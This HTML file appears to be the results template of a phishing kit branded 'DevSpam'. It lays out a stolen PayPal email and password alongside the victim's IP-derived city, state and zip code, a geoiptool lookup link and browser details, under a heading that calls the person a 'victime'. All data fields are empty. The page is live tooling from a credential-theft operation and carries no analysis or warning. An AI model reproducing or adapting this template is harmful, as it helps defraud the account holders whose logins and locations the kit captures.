
     
		<head>
        <title>DST Rezult</title>
        <style type='text/css'>
            div{
                width:800px;
                background-color: rgb(36,46,60);
                border:3px solid rgb(127,187,25);
                margin:0 auto 8px ;
                padding:0;
                border-radius:10px;
                font-family: Candara ,HelveticaNeue,'Helvetica Neue',Helvetica,Arial;
            }
            img{
                padding-left: 8px;
            }
            td{
              color: white;
            }
        </style>
    </head>
    <body>
    <div >
            <span style='display:block;border-bottom:2px solid rgb(127,187,25); padding: 8px 20px;color: LightGray;'>
                <table width='100%'>
                    <tr>
                        <td><h5 style='margin:0;color: LightGray;'>New Login <span style='color: rgb(127,187,25);'></span> From [<span style='color: rgb(127,187,25);'></span>]</h5></td>
                        <td align='right'><span style='font-size:12px;font-family: Verdana;'>05:55:37 19/05/2017</span></td>
                    </tr>
                </table>
            </span>
            <span style='display:block;padding: 7px 25px;'>
              <table style='font-size:14px;color:#444;margin-bottom:5px; border-collapse:collapse; padding-left:10px; padding-right:10px; padding-top:5px; padding-bottom:5px' border='1' bordercolorlight='#808080' bordercolordark='#808080'>
                <tr>
                  <td colspan='3'>
					<p align='center'><b><font color='#009900'>LOGIN INFORMATION</font></b></td>
                </tr>                
 <tr>
                  <td>PP Email</td>
                  <td>:</td>
                  <td style='color: rgb(127,187,25);'></td>
                </tr>
                <tr>
                  <td>PP Password</td>
                  <td>:</td>
                  <td style='color: rgb(127,187,25);'></td>
                </tr>
                <tr>
                  <td colspan='3'>
					<p align='center'><b><font color='#009900'>IP LOOKUP INFORMATION</font></b></td>
                </tr>
                
                <tr>
                  <td><span>City</span></td>
                  <td>:</td>
                  <td style='color: rgb(127,187,25);'></td>
                </tr>
                <tr>
                  <td><span>State</span></td>
                  <td>:</td>
                  <td style='color: rgb(127,187,25);'>()</td>
                </tr>
                <tr>
                  <td><span>Zip Code</span></td>
                  <td>:</td>
                  <td style='color: rgb(127,187,25);'></td>
                </tr>
                <tr>
                  <td colspan='3'>
					<p align='center'><b><font color='#009900'>VICTIME INFORMATION</font></b></td>
                </tr>
                <tr>
                  <td><span>IP Info</span></td>
                  <td>:</td>
                  <td style='color: rgb(127,187,25);'>https://geoiptool.com/en/?ip=</td>
                </tr>
                                <tr>
                  <td><span>Browser</span></td>
                  <td>:</td>
                  <td style='color: rgb(127,187,25);'>Chrome On Windows 8.1</td>
                </tr>
            </table>
        </span>
		        </span>
				<hr color='#7fbb19'>
            <span style='display:block;border-bottom:2px solid rgb(127,187,25); padding: 8px 20px;color: LightGray;'>
                <table width='100%'>
                    <tr>
                        <td><h5 style='margin:0;color: LightGray;'><span style='color: rgb(127,187,25);'>
						By DevSpam</span></h5></td>
                        <td align='right'><span style='font-size:12px;font-family: Verdana;'></span></td>
                    </tr>
                </table>
            </span>
    </div>
</body>

